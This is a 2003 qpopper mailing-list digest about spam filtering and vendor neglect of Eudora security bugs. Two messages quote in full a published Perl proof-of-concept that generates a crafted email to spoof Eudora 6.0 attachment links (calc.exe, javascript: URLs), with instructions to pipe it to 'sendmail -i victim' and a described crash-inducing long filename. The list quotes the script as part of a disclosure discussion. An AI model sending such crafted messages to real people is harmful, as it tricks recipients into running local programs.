The qpopper list archive ending on 23 Sep 2003
Topics covered in this issue include:
1. Spam question
"Dan Lee" <dlee at appcim dot com>
Mon, 15 Sep 2003 09:59:10 -0500
2. RE: Spam question
"Matthew Thomas" <mthomas at biocontrolsys dot com>
Mon, 15 Sep 2003 08:11:07 -0700
3. Re: Spam question
"Ken Hohhof" <ken at mixedsignal dot com>
Mon, 15 Sep 2003 09:48:54 -0500
4. security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 11:50:25 -0400
5. Re: Spam question
Ken Anderson <ka at pacific dot net>
Mon, 15 Sep 2003 08:30:53 -0700
6. Re: security issues
Daniel Senie <dts at senie dot com>
Mon, 15 Sep 2003 12:34:37 -0400
7. Re: security issues
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 13:21:09 -0400 (EDT)
8. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 13:17:48 -0400 (EDT)
9. Re: Spam question
Daniel Senie <dts at senie dot com>
Mon, 15 Sep 2003 12:51:01 -0400
10. Re: Spam question
Ken Anderson <ka at pacific dot net>
Mon, 15 Sep 2003 10:54:03 -0700
11. Re: Spam question
Ken Anderson <ka at pacific dot net>
Mon, 15 Sep 2003 10:57:55 -0700
12. Re: security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 14:24:52 -0400
13. Re: Spam question
Daniel Senie <dts at senie dot com>
Mon, 15 Sep 2003 14:41:53 -0400
14. Re: Spam question
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Mon, 15 Sep 2003 16:58:24 -0400
15. Re: security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 17:07:42 -0400
16. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 14:56:48 -0400 (EDT)
17. Re: security issues
Mike Tancsa <mike at sentex dot net>
Mon, 15 Sep 2003 16:11:05 -0400
18. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 14:38:31 -0400 (EDT)
19. Re: security issues
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Mon, 15 Sep 2003 17:01:23 -0400
20. Re: security issues
Clifton Royston <cliftonr at lava dot net>
Mon, 15 Sep 2003 10:04:04 -1000
21. Re: Spam question
Kenneth Porter <shiva at sewingwitch dot com>
Mon, 15 Sep 2003 23:09:40 -0700
22. Re: security issues
Kenneth Porter <shiva at sewingwitch dot com>
Mon, 15 Sep 2003 23:15:55 -0700
23. Re: Spam question
Alan Brown <alanb at digistar dot com>
Mon, 15 Sep 2003 14:54:21 -0400 (EDT)
24. Re: Spam question
Alan Brown <alanb at digistar dot com>
Tue, 16 Sep 2003 06:23:04 -0400 (EDT)
25. Re: Spam question
Ken Anderson <ka at pacific dot net>
Tue, 16 Sep 2003 07:39:12 -0700
26. problems with patch and mysql
joe ritter <glestadt4 at yahoo dot com>
Fri, 19 Sep 2003 09:17:42 -0700 (PDT)
27. Interested in writing QPopper patch
"Alan W. Rateliff, II" <lists at rateliff dot net>
Fri, 19 Sep 2003 19:41:48 -0400
28. Re: Interested in writing QPopper patch
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Fri, 19 Sep 2003 21:02:40 -0400
29. Re: Spam question
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Fri, 19 Sep 2003 21:04:19 -0400
30. Re: Interested in writing QPopper patch
"Alan W. Rateliff, II" <lists at rateliff dot net>
Sat, 20 Sep 2003 01:11:23 -0400
31. How to setup multiple domain pop server
Wayne Heming <wheming at hemnet.com dot au>
Sat, 20 Sep 2003 15:14:23 +1000
32. Re: Interested in writing QPopper patch
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Sat, 20 Sep 2003 13:44:38 -0400
33. Re: How to setup multiple domain pop server
Robert Brandtjen <rob at prometheusmedia dot com>
20 Sep 2003 18:34:12 -0500
34. Re: How to setup multiple domain pop server
Wayne Heming <wheming at hemnet.com dot au>
Sun, 21 Sep 2003 11:05:25 +1000
35. Re: How to setup multiple domain pop server
"Lisa Casey" <lisa at jellico dot net>
Sat, 20 Sep 2003 22:17:33 -0400
36. Re: How to setup multiple domain pop server
Joe Maimon <jmaimon at ttec dot com>
Sat, 20 Sep 2003 23:45:22 -0400
37. Re: How to setup multiple domain pop server
Richard Gration <richard at zync.co dot uk>
Sun, 21 Sep 2003 12:56:21 +0100
38. Re: How to setup multiple domain pop server
Alan Brown <alanb at digistar dot com>
Sun, 21 Sep 2003 08:17:45 -0400 (EDT)
39. Re: How to setup multiple domain pop server
Richard Gration <richard at zync.co dot uk>
Sun, 21 Sep 2003 13:39:53 +0100
40. Re: How to setup multiple domain pop server
The Little Prince <thelittleprince at asteroid-b612 dot org>
Sun, 21 Sep 2003 09:12:47 -0700 (PDT)
41. QPOP/SSL vs Outlook Express
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 16:06:17 -0400
42. Re: QPOP/SSL vs Outlook Express
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 17:07:57 -0400
43. Re: How to setup multiple domain pop server
Chuck Yerkes <chuck+qpopper at yerkes dot com>
Mon, 22 Sep 2003 17:44:25 -0400
44. SSL CA Certificate problem
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 17:47:54 -0400
45. Re: How to setup multiple domain pop server
Alan Brown <alanb at digistar dot com>
Mon, 22 Sep 2003 18:16:54 -0400 (EDT)
46. SSL help, Qpopper and Sendmail
"Alan W. Rateliff, II" <lists at rateliff dot net>
Mon, 22 Sep 2003 23:06:44 -0400
47. Re: How to setup multiple domain pop server
Wayne Heming <wheming at hemnet.com dot au>
Tue, 23 Sep 2003 19:10:37 +1000
48. .lock files and quotas
"Chris Szilagyi" <chris at apex-internet dot com>
Tue, 23 Sep 2003 14:52:53 -0000
49. Re: .lock files and quotas
"Chris Szilagyi" <chris at apex-internet dot com>
Tue, 23 Sep 2003 17:55:31 -0000
50. Re: SSL help, Qpopper and Sendmail
Kenneth Porter <shiva at sewingwitch dot com>
Tue, 23 Sep 2003 14:32:44 -0700
Subject: Spam question
Date: Mon, 15 Sep 2003 09:59:10 -0500
From: "Dan Lee" <dlee at appcim dot com>
Hi Everyone,
Was hoping someone might be able to give me some insight into a spam
blocking application that works with qpopper. I'm running qpopper for
my pop server on a freebsd box. I've got about 10 users on this box and
been getting complaints about spam. Has anyone installed spamassassin?
Do I need procmail? Is there a more appropriate spam blocking utility?
I'm really new to the list and any advice on/off list would be hugely
appreciated.
Thanks,
Dan
From: "Matthew Thomas" <mthomas at biocontrolsys dot com>
Subject: RE: Spam question
Date: Mon, 15 Sep 2003 08:11:07 -0700
Dan,
I use sendmail/qpopper/MIMEDefang/spamassassin. It works very well for me.
There is a bit of a howto located at
http://www.rudolphtire.com/mimedefang-howto for this configuration.
Spamassassin and MIMEDefang both have very active mailing lists. In that
configuration, Sendmail calls MIMEDefang and MIMEDefang calls spamassassin.
Qpopper just does its normal thing. MIMEDefang was a lifesaver when we
decided to just drop the thousands of sobig emails were were receiving.
Spamassassin catches over 99% of the incoming spam we receive.
Regards,
Matt Thomas
> -----Original Message-----
> From: Dan Lee [mailto:dlee at appcim dot com]
> Sent: Monday, September 15, 2003 7:59 AM
> To: Subscribers of Qpopper
> Subject: Spam question
>
>
> Hi Everyone,
>
> Was hoping someone might be able to give me some insight into
> a spam blocking application that works with qpopper. I'm
> running qpopper for my pop server on a freebsd box. I've got
> about 10 users on this box and been getting complaints about
> spam. Has anyone installed spamassassin? Do I need procmail?
> Is there a more appropriate spam blocking utility? I'm
> really new to the list and any advice on/off list would be
> hugely appreciated.
>
> Thanks,
> Dan
>
From: "Ken Hohhof" <ken at mixedsignal dot com>
Subject: Re: Spam question
Date: Mon, 15 Sep 2003 09:48:54 -0500
I think spam blockers work with the MTA that delivers the mail to mailboxes
(e.g. sendmail), not with the POP3 server. Once the junk is in the user's
mailspool, it's a little late to block it.
----- Original Message -----
From: "Dan Lee" <dlee at appcim dot com>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Monday, September 15, 2003 9:59 AM
Subject: Spam question
> Hi Everyone,
>
> Was hoping someone might be able to give me some insight into a spam
> blocking application that works with qpopper. I'm running qpopper for
> my pop server on a freebsd box. I've got about 10 users on this box and
> been getting complaints about spam. Has anyone installed spamassassin?
> Do I need procmail? Is there a more appropriate spam blocking utility?
> I'm really new to the list and any advice on/off list would be hugely
> appreciated.
>
> Thanks,
> Dan
>
Date: Mon, 15 Sep 2003 11:50:25 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: security issues
I know this is the qppopper list, but can anyone from qualcomm comment on
the security issues for Eudora ? I find it rather distressing that several
known holes would be seemingly left unaddressed for so long. Perhaps the
qualcomm people here can respond on bugtraq where the posting below was made.
---Mike
-------------------------------
>Eudora 6.0 was released recently; I tested the Windows version only.
>It still contains several vulnerabilities, the most serious being an
>execute-any-code bug. It is distressing that the "spoof and steal" bug
>was pointed out years ago; the execute-any-code bug in 5.2.1 was sent
>to Qualcomm on 29 May 2003.
>
>Cheers,
>
>Paul Szabo - psz at maths.usyd.edu.au http://www.maths.usyd.edu dot au:8000/u/psz/
>School of Mathematics and Statistics University of Sydney 2006 Australia
>
>---
>
>#!/usr/bin/perl --
>
>use MIME::Base64;
>
>print "From: me\n";
>print "To: you\n";
>print "Subject: Eudora 6.0 on Windows exploit\n";
>print "MIME-Version: 1.0\n";
>print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
>print "\n";
>print "This is a multi-part message in MIME format.\n";
>print "--zzz\n";
>print "Content-Type: text/plain\n";
>print "Content-Transfer-Encoding: 7bit\n";
>print "\n";
>
>print "Pipe the output of this script into: sendmail -i victim\n";
>
>print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and
>In.mbx.002 files. Any way to turn this wasteful feature off?\n";
>
>print "\nWith spoofed attachments, we could 'steal' files if the message
>was forwarded (not replied to).\n";
>
>print "\nSending a long filename e.g.:\n";
>print "Attachment Converted\r: \"\\AAA...AAA\"\n";
>print "(with 250 or so repetitions of \"A\") makes Eudora crash.
>Eudora is then unable to start, until the offending message is
>removed from In.mbx (using some utility other than Eudora itself).
>This buffer overflow can easily be made into an execute-any-code
>exploit (but is not shown here for script kiddies).\n";
>
>print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
>CR=x0d characters get converted internally into a NUL=x00 and ignored,
>so we can spoof \"attachment converted\" lines:\n";
>
>print "\nThe following work fine (but are boring and/or put up warnings):\n";
>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
>print "(Note how JavaScript is done with IE, web with default browser
>Netscape)\n";
>print "Attachment Converted\r: <A
>href=javascript:alert(%27hello%27)>hello.txt</a>\n";
>print "Attachment Converted\r: <A
>href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
>print "Attachment Converted\r: <A
>href=c:/winnt/system32/calc.exe>file.txt</a>\n";
>
>print "\nIf we can guess the full path to the attach directory then can
>change the name shown to anything we like, but get broken icon:\n";
>print "Attachment Converted\r: <A
>href=H:/windows/.eudora/attach/calc>file.txt</a>\n";
>
>print "\nCuteness value only:\n";
>print "Attachment Converted\r: <A
>href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A
>href=c:/winnt/system32/calc.exe>file2.txt</a>\n";
>
>print "\n<x-html>
>With <b>HTML</b> <i>inclusions</i> we can do
><a href=c:/winnt/system32/calc.exe>file</a>,
><a
>href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
>and
><a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
>references. Any way to exploit this?
></x-html>\n";
>
>print "\n<x-rich>
>Can also do RTF inclusions. Can this be abused?
>\n";
>
>print "\nThose <x-xyz></x-xyz> constructs allow spoofing
>attachments easily, without embedded CR:\n\n";
>print "HTML\n";
>print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
>print "Rich\n";
>print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
>print "Flowed\n";
>print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";
>
>print "\n";
>
>print "\n--zzz\n";
>print "Content-Type: text/plain; name=\"plain.txt\"\n";
>print "Content-Transfer-Encoding: 7bit\n";
>print "Content-Disposition: inline; filename=\"plain.txt\"\n";
>print "\n";
>print "Within a 'plain' attachment:\n";
>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>
>print "\n--zzz\n";
>print "Content-Type: text/plain; name=\"qp.txt\"\n";
>print "Content-Transfer-Encoding: quoted-printable \n";
>print "Content-Disposition: inline; filename=\"qp.txt\"\n";
>print "\n";
>print "Within quoted-printable encoded parts still need the embedded CR:\n";
>print "=41ttachment =43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";
>
>print "\n--zzz\n";
>print "Content-Type: text/plain; name=\"b64.txt\"\n";
>print "Content-Transfer-Encoding: base64\n";
>print "Content-Disposition: inline; filename=\"b64.txt\"\n";
>print "\n";
>$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
>without embedded CR (but line termination is CR-NL):\r
>#Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
>print encode_base64($z);
>
>print "\n--zzz--\n";
>print "\n";
Date: Mon, 15 Sep 2003 08:30:53 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
There's a proxy server that supports pop3 called prometo on sourceforge
that recently added SA support. I've tested it with qpopper, and it
works good with SA, but there's no way to do per user rules. Pretty cool
to do this on the pop3 side tho.
Normally, SA is installed as a milter in sendmail or with another MTA.
Ken A.
Dan Lee wrote:
> Hi Everyone,
>
> Was hoping someone might be able to give me some insight into a spam
> blocking application that works with qpopper. I'm running qpopper for
> my pop server on a freebsd box. I've got about 10 users on this box and
> been getting complaints about spam. Has anyone installed spamassassin?
> Do I need procmail? Is there a more appropriate spam blocking utility?
> I'm really new to the list and any advice on/off list would be hugely
> appreciated.
>
> Thanks,
> Dan
>
>
Date: Mon, 15 Sep 2003 12:34:37 -0400
From: Daniel Senie <dts at senie dot com>
Subject: Re: security issues
At 11:50 AM 9/15/2003, Mike Tancsa wrote:
>I know this is the qppopper list, but can anyone from qualcomm comment on
>the security issues for Eudora ? I find it rather distressing that
>several known holes would be seemingly left unaddressed for so
>long. Perhaps the qualcomm people here can respond on bugtraq where the
>posting below was made.
This really isn't the right list. I'm getting the distinct impression the
engineers working on Eudora are spending their time on neat new features
(spam filtering, etc.) at the expense of bug fixes. I've submitted several
bug reports dating back two years and find that with each new release, none
have been addressed.
I'm starting to think about re-evaluating my recommendation to clients that
they use Eudora, just because the product is seemingly unsupported.
> ---Mike
>
>-------------------------------
>>Eudora 6.0 was released recently; I tested the Windows version only.
>>It still contains several vulnerabilities, the most serious being an
>>execute-any-code bug. It is distressing that the "spoof and steal" bug
>>was pointed out years ago; the execute-any-code bug in 5.2.1 was sent
>>to Qualcomm on 29 May 2003.
>>
>>Cheers,
>>
>>Paul Szabo - psz at maths.usyd.edu.au http://www.maths.usyd.edu dot au:8000/u/psz/
>>School of Mathematics and Statistics University of Sydney 2006 Australia
>>
>>---
>>
>>#!/usr/bin/perl --
>>
>>use MIME::Base64;
>>
>>print "From: me\n";
>>print "To: you\n";
>>print "Subject: Eudora 6.0 on Windows exploit\n";
>>print "MIME-Version: 1.0\n";
>>print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
>>print "\n";
>>print "This is a multi-part message in MIME format.\n";
>>print "--zzz\n";
>>print "Content-Type: text/plain\n";
>>print "Content-Transfer-Encoding: 7bit\n";
>>print "\n";
>>
>>print "Pipe the output of this script into: sendmail -i victim\n";
>>
>>print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and
>>In.mbx.002 files. Any way to turn this wasteful feature off?\n";
>>
>>print "\nWith spoofed attachments, we could 'steal' files if the message
>>was forwarded (not replied to).\n";
>>
>>print "\nSending a long filename e.g.:\n";
>>print "Attachment Converted\r: \"\\AAA...AAA\"\n";
>>print "(with 250 or so repetitions of \"A\") makes Eudora crash.
>>Eudora is then unable to start, until the offending message is
>>removed from In.mbx (using some utility other than Eudora itself).
>>This buffer overflow can easily be made into an execute-any-code
>>exploit (but is not shown here for script kiddies).\n";
>>
>>print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
>>CR=x0d characters get converted internally into a NUL=x00 and ignored,
>>so we can spoof \"attachment converted\" lines:\n";
>>
>>print "\nThe following work fine (but are boring and/or put up warnings):\n";
>>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>>print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
>>print "(Note how JavaScript is done with IE, web with default browser
>>Netscape)\n";
>>print "Attachment Converted\r: <A
>>href=javascript:alert(%27hello%27)>hello.txt</a>\n";
>>print "Attachment Converted\r: <A
>>href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
>>print "Attachment Converted\r: <A
>>href=c:/winnt/system32/calc.exe>file.txt</a>\n";
>>
>>print "\nIf we can guess the full path to the attach directory then can
>>change the name shown to anything we like, but get broken icon:\n";
>>print "Attachment Converted\r: <A
>>href=H:/windows/.eudora/attach/calc>file.txt</a>\n";
>>
>>print "\nCuteness value only:\n";
>>print "Attachment Converted\r: <A
>>href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A
>>href=c:/winnt/system32/calc.exe>file2.txt</a>\n";
>>
>>print "\n<x-html>
>>With <b>HTML</b> <i>inclusions</i> we can do
>><a href=c:/winnt/system32/calc.exe>file</a>,
>><a
>>href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
>>and
>><a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
>>references. Any way to exploit this?
>></x-html>\n";
>>
>>print "\n<x-rich>
>>Can also do RTF inclusions. Can this be abused?
>>\n";
>>
>>print "\nThose <x-xyz></x-xyz> constructs allow spoofing
>>attachments easily, without embedded CR:\n\n";
>>print "HTML\n";
>>print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
>>print "Rich\n";
>>print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
>>print "Flowed\n";
>>print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";
>>
>>print "\n";
>>
>>print "\n--zzz\n";
>>print "Content-Type: text/plain; name=\"plain.txt\"\n";
>>print "Content-Transfer-Encoding: 7bit\n";
>>print "Content-Disposition: inline; filename=\"plain.txt\"\n";
>>print "\n";
>>print "Within a 'plain' attachment:\n";
>>print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
>>
>>print "\n--zzz\n";
>>print "Content-Type: text/plain; name=\"qp.txt\"\n";
>>print "Content-Transfer-Encoding: quoted-printable \n";
>>print "Content-Disposition: inline; filename=\"qp.txt\"\n";
>>print "\n";
>>print "Within quoted-printable encoded parts still need the embedded CR:\n";
>>print "=41ttachment =43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";
>>
>>print "\n--zzz\n";
>>print "Content-Type: text/plain; name=\"b64.txt\"\n";
>>print "Content-Transfer-Encoding: base64\n";
>>print "Content-Disposition: inline; filename=\"b64.txt\"\n";
>>print "\n";
>>$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
>>without embedded CR (but line termination is CR-NL):\r
>>#Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
>>print encode_base64($z);
>>
>>print "\n--zzz--\n";
>>print "\n";
Date: Mon, 15 Sep 2003 13:21:09 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: security issues
On Mon, 15 Sep 2003, Daniel Senie wrote:
> I'm starting to think about re-evaluating my recommendation to clients that
> they use Eudora, just because the product is seemingly unsupported.
Pegasus is almost the same in terms of ease of use, with a slightly
different GUI and enhanced core feature set (but it won't follow html
webbugs, etc - this is a big plus)
Eudora itself succumbed to creeping bloatitus a long time ago. It's a
pity, bucause it used to be a small, fast, tightly engineered mail client.
Date: Mon, 15 Sep 2003 13:17:48 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Ken Anderson wrote:
> There's a proxy server that supports pop3 called prometo on sourceforge
> that recently added SA support. I've tested it with qpopper, and it
> works good with SA, but there's no way to do per user rules. Pretty cool
> to do this on the pop3 side tho.
All of these are still automated forms of JHD (Just Hit Delete)
There is a _LOT_ of collateral damage from the practice of JHD.
Genuine messages ("False positives") rejected by spam filters at MTA
level result in reject messages arriving back at the original
(non-forged) sender address, so they at least know something went wrong.
Any form of delete filtering after the message hits a user's inbox
means that False Positives are silently dumped.
I've just been through this problem at $orkplace with a vendor's support
mailbox silently trashing our mail, resulting in near-cancellation of a
$100,000 contract. If their spam filters had been rejecting our messages
we'd at least have known to phone them, instead of assuming we were
being ignored.
Anyone doing MUA-level or POP3/IMAP-server-level filtering-by-deletion
does so at their own peril. This is something which is best done in the
SMTP handshake (it's trivial to reject messages after DATA and before
the end-of-conversation.)
Date: Mon, 15 Sep 2003 12:51:01 -0400
From: Daniel Senie <dts at senie dot com>
Subject: Re: Spam question
At 11:30 AM 9/15/2003, Ken Anderson wrote:
>There's a proxy server that supports pop3 called prometo on sourceforge
>that recently added SA support. I've tested it with qpopper, and it works
>good with SA, but there's no way to do per user rules. Pretty cool to do
>this on the pop3 side tho.
>
>Normally, SA is installed as a milter in sendmail or with another MTA.
We use procmail to deliver to users' mailboxes, and run spamassassin from
there. As a result, we can enable/disable on a per user basis. Allowing
users control is still an issue, though.
Date: Mon, 15 Sep 2003 10:54:03 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
Using SpamAssassin doesn't necessarily mean you are deleting mail.
Any filter must be setup correctly by the sysadmin. Setting up any
filter incorrectly or too restrictively will cause problems for
customers like those you describe.
Ken A.
Alan Brown wrote:
> On Mon, 15 Sep 2003, Ken Anderson wrote:
>
>
>>There's a proxy server that supports pop3 called prometo on sourceforge
>>that recently added SA support. I've tested it with qpopper, and it
>>works good with SA, but there's no way to do per user rules. Pretty cool
>>to do this on the pop3 side tho.
>
>
> All of these are still automated forms of JHD (Just Hit Delete)
>
> There is a _LOT_ of collateral damage from the practice of JHD.
>
>
> Genuine messages ("False positives") rejected by spam filters at MTA
> level result in reject messages arriving back at the original
> (non-forged) sender address, so they at least know something went wrong.
>
>
> Any form of delete filtering after the message hits a user's inbox
> means that False Positives are silently dumped.
>
>
> I've just been through this problem at $orkplace with a vendor's support
> mailbox silently trashing our mail, resulting in near-cancellation of a
> $100,000 contract. If their spam filters had been rejecting our messages
> we'd at least have known to phone them, instead of assuming we were
> being ignored.
>
>
>
> Anyone doing MUA-level or POP3/IMAP-server-level filtering-by-deletion
> does so at their own peril. This is something which is best done in the
> SMTP handshake (it's trivial to reject messages after DATA and before
> the end-of-conversation.)
>
>
>
>
>
Date: Mon, 15 Sep 2003 10:57:55 -0700
From: Ken Anderson <ka at pacific dot net>
Subject: Re: Spam question
We use MailScanner/SA with sendmail and limited per user rules.
It works good, but users are not so bright, and as you suggest, there's
no cure for that problem.
Ken
Daniel Senie wrote:
> At 11:30 AM 9/15/2003, Ken Anderson wrote:
>
>> There's a proxy server that supports pop3 called prometo on
>> sourceforge that recently added SA support. I've tested it with
>> qpopper, and it works good with SA, but there's no way to do per user
>> rules. Pretty cool to do this on the pop3 side tho.
>>
>> Normally, SA is installed as a milter in sendmail or with another MTA.
>
>
> We use procmail to deliver to users' mailboxes, and run spamassassin
> from there. As a result, we can enable/disable on a per user basis.
> Allowing users control is still an issue, though.
>
>
Date: Mon, 15 Sep 2003 14:24:52 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: Re: security issues
At 12:34 PM 15/09/2003, Daniel Senie wrote:
>At 11:50 AM 9/15/2003, Mike Tancsa wrote:
>
>
>>I know this is the qppopper list, but can anyone from qualcomm comment on
>>the security issues for Eudora ? I find it rather distressing that
>>several known holes would be seemingly left unaddressed for so
>>long. Perhaps the qualcomm people here can respond on bugtraq where the
>>posting below was made.
>
>This really isn't the right list. I'm getting the distinct impression the
I realize that, but I am getting concerned that after a year of no response
on bugtraq or full disclosure the Eudora engineers are ???? I dont know,
dont care ? Are not given the resources to care ? Dont understand ? It
would be nice if they said something.
---Mike
Date: Mon, 15 Sep 2003 14:41:53 -0400
From: Daniel Senie <dts at senie dot com>
Subject: Re: Spam question
At 02:38 PM 9/15/2003, Alan Brown wrote:
>On Mon, 15 Sep 2003, Daniel Senie wrote:
>
> > We use procmail to deliver to users' mailboxes, and run spamassassin from
> > there. As a result, we can enable/disable on a per user basis. Allowing
> > users control is still an issue, though.
>
>If you can't run milters, consider Messagewall as a prophylactic
>frontend to your mailserver.
We can run milters. In this case we don't want to do so. By running SA from
procmail, we can enable it for those users who want it, and not for those
who don't. There are no circumstances under which I'd run a proxy product,
as it would seriously interfere with routine operations.
I was offering the method we use as an example to Ken of other ways to
approach this issue. We're happy with our approach. It fits our needs, and
our customers' very well.
Dan
Date: Mon, 15 Sep 2003 16:58:24 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: Spam question
WE filter in the MTA (a milter) to spam assassin.
Scores > 15 get dumped (highest false pos was 9.something
in the 2 month pilot). We'll likely move that score to
10. Score > 5.0 gets MARKED (and the mail system moves
it into a "quarantine" folder where 99% is spam but the
occasional real messages makes it if really badly composed.
Almost always some kind of bulk mail - lists, stuff with lots
of HTML with wierd headers (bad message-ids, etc).
The number of "real mail" that marks false positive is pretty
small. Damn close to zero for folks using plain text (old tyme
unix folks).
Milter catches mail during SMTP so we don't have to bounce stuff
either.
60% of mail is spam here. Lopping off 1/3 of all mail and marking
another 1/3rd is a win. (I'm tempted to turn it off 1 day a month
to remind people).
Quoting Ken Anderson (ka at pacific dot net):
> We use MailScanner/SA with sendmail and limited per user rules.
> It works good, but users are not so bright, and as you suggest, there's
> no cure for that problem.
> Ken
>
>
> Daniel Senie wrote:
>
> >At 11:30 AM 9/15/2003, Ken Anderson wrote:
> >
> >>There's a proxy server that supports pop3 called prometo on
> >>sourceforge that recently added SA support. I've tested it with
> >>qpopper, and it works good with SA, but there's no way to do per user
> >>rules. Pretty cool to do this on the pop3 side tho.
> >>
> >>Normally, SA is installed as a milter in sendmail or with another MTA.
> >
> >
> >We use procmail to deliver to users' mailboxes, and run spamassassin
> >from there. As a result, we can enable/disable on a per user basis.
> >Allowing users control is still an issue, though.
> >
> >
Date: Mon, 15 Sep 2003 17:07:42 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: Re: security issues
Thanks,
I have contacted qualcomm as have other paying customers of Eudora
to no effect.
---Mike
At 05:01 PM 15/09/2003, Chuck Yerkes wrote:
>Then call up qualcomm. Recall that the eudora folks don't
>likely work that closely with the popper/opensource folks.
>
>I can grouse to folks in other departments when someone
>doesn't like MY companies products, but I carry little weight
>with them.
>
>A paying customer grousing carries a LOT more weight.
>
>replies back to list please (per the reply-to:)
>
>Quoting Mike Tancsa (mike at sentex dot net):
> > At 12:34 PM 15/09/2003, Daniel Senie wrote:
> > >At 11:50 AM 9/15/2003, Mike Tancsa wrote:
> > >
> > >
> > >>I know this is the qppopper list, but can anyone from qualcomm
> comment on
> > >>the security issues for Eudora ? I find it rather distressing that
> > >>several known holes would be seemingly left unaddressed for so
> > >>long. Perhaps the qualcomm people here can respond on bugtraq where the
> > >>posting below was made.
> > >
> > >This really isn't the right list. I'm getting the distinct impression the
> >
> > I realize that, but I am getting concerned that after a year of no
> response
> > on bugtraq or full disclosure the Eudora engineers are ???? I dont know,
> > dont care ? Are not given the resources to care ? Dont understand ? It
> > would be nice if they said something.
> >
> > ---Mike
Date: Mon, 15 Sep 2003 14:56:48 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Ken Anderson wrote:
> Using SpamAssassin doesn't necessarily mean you are deleting mail.
Indeed, but anyone who does needs to be aware of the consequences of
doing so - and most people using at MUA level are using it in delete
mode.
Date: Mon, 15 Sep 2003 16:11:05 -0400
From: Mike Tancsa <mike at sentex dot net>
Subject: Re: security issues
At 04:04 PM 15/09/2003, Clifton Royston wrote:
> > I realize that, but I am getting concerned that after a year of no
> response
> > on bugtraq or full disclosure the Eudora engineers are ???? I dont know,
> > dont care ? Are not given the resources to care ? Dont understand ? It
> > would be nice if they said something.
>
> As far as I know, Randy Gellens is the *only* person from Qualcomm on
But he is from qualcomm and perhaps he can at least send a message to the
right people at qualcomm. I dont expect the qpopper people (person) to do
anything. But I would hope he would at least communicate to the appropriate
person just how bad this looks on qualcomm.
---Mike
Date: Mon, 15 Sep 2003 14:38:31 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Spam question
On Mon, 15 Sep 2003, Daniel Senie wrote:
> We use procmail to deliver to users' mailboxes, and run spamassassin from
> there. As a result, we can enable/disable on a per user basis. Allowing
> users control is still an issue, though.
If you can't run milters, consider Messagewall as a prophylactic
frontend to your mailserver.
www.messagewall.org
Date: Mon, 15 Sep 2003 17:01:23 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: security issues
Then call up qualcomm. Recall that the eudora folks don't
likely work that closely with the popper/opensource folks.
I can grouse to folks in other departments when someone
doesn't like MY companies products, but I carry little weight
with them.
A paying customer grousing carries a LOT more weight.
replies back to list please (per the reply-to:)
Quoting Mike Tancsa (mike at sentex dot net):
> At 12:34 PM 15/09/2003, Daniel Senie wrote:
> >At 11:50 AM 9/15/2003, Mike Tancsa wrote:
